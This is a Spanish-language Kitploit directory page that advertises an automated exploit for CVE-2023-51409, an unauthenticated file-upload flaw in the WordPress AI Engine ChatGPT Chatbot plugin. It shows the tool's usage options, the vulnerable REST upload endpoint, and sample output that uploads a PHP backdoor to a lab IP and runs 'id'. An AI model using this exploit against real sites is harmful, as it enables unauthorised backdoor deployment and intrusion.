Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-51409 — Exploit automatizado para CVE-2023-51409, una vulnerabilidad de carga de archivos arbitraria no autenticada en el plugin de WordPress AI Engine ChatGPT Chatbot, que permite el despliegue de una puerta trasera PHP. | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2023-51409
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubnxploited/cve-2023-51409

CVE-2023-51409

Exploit automatizado para CVE-2023-51409, una vulnerabilidad de carga de archivos arbitraria no autenticada en el plugin de WordPress AI Engine ChatGPT Chatbot, que permite el despliegue de una puerta trasera PHP.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-51409

AI Engine: ChatGPT Chatbot <= 1.9.98 - Carga Arbitraria de Archivos sin Autenticación vía rest_upload

Descripción

Esto podría permitir que un actor malicioso cargue cualquier tipo de archivo en su sitio web. Esto puede incluir puertas traseras que luego se ejecutan para obtener más acceso a su sitio web.

uso:

root@kitploit:~
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress instance.
  -code PHP_CODE, --php_code PHP_CODE
  PHP code to upload (default, id).

El resultado

root@kitploit:~
[INFO] Initiating version check for target.
[INFO] Target plugin version detected: 1.9.98
[VULNERABLE] Detected vulnerable plugin version. Proceeding with exploitation.
[INFO] Target is vulnerable. Proceeding with file upload.
[INFO] Attempting to upload file: Nxploit.php to endpoint: http://192.168.100.74:888/wordpress/wp-json/mwai-ui/v1/files/upload
[SUCCESS] File uploaded successfully! Accessible at: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
[INFO] Exploitation complete. Uploaded file URL: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php

código php por defecto

root@kitploit:~
id 
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Descargar herramienta